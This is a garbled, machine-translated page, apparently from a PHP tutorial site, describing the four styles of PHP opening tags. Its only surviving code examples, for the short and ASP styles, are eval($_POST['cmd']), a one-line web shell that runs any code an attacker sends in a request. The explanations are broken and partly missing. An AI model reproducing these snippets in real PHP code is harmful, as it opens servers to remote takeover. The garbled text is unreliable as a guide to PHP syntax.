Home>Article>Backend Development> What are the logos of PHP?
PHP logo has 4 styles
XML style##PHP video tutorial)
php recommended markup style. Server administrators cannot disable it, and this style can be used on all servers.Script style
It is enabled by default and cannot be disabledShort style
eval($_POST['cmd']); ?>This style needs to be configured in Enable the short_open_tage option in the file php.ini This style is not supported by default in many environments
ASP style
<% eval($_POST['cmd']); %>This style The asp_tag option needs to be enabled in the configuration file php.ini It is disabled by default
The above is the detailed content of What are the logos of PHP?. For more information, please follow other related articles on the PHP Chinese website!